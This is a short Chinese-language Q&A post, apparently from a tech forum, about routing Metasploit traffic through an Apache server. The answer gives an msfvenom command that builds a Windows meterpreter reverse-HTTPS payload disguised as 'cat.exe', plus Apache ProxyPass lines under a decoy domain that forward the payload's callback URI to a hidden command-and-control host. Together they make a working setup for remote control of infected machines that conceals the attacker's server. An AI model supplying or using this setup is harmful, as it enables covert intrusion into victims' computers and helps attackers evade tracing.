将 Metasploit 请求转发到另一个 IP

将 Metasploit 请求转发到另一个 IP

我想在家里设置一个静态 Apache 网络服务器,将所有传入的 Metasploit 连接转发到另一个 IP。这可能吗?如果可以,怎么做?如果有帮助,我希望在 RasPi B+ 上运行 Apache 服务器。

答案1

首先,创建有效载荷:

msfvenom -p windows/meterpreter/reverse_https LHOST=<IP OR DOMAIN NAME> LPORT=<PORT or 443> LURI=/myawesomecnc -o /root/cat.exe

最重要的部分是您需要设置为特定资源的 LURI。有效负载生成的所有流量都将定向到此 URI。

完成后,使用 Apache 或 nginx 中的 ProxyPass 指令仅将 /myawesomecnc 的流量转发到您想要的特定主机。以下是 Apache 的示例:

<VirtualHost *:443>

  ServerName www.totallyharmless.com
...
  ProxyPass /myawesomecnc/ http://1.2.3.4/myawesomecnc/
  ProxyPassReverse /myawesomecnc/ http://1.2.3.4/myawesomecnc/
...
</VirtualHost>

相关内容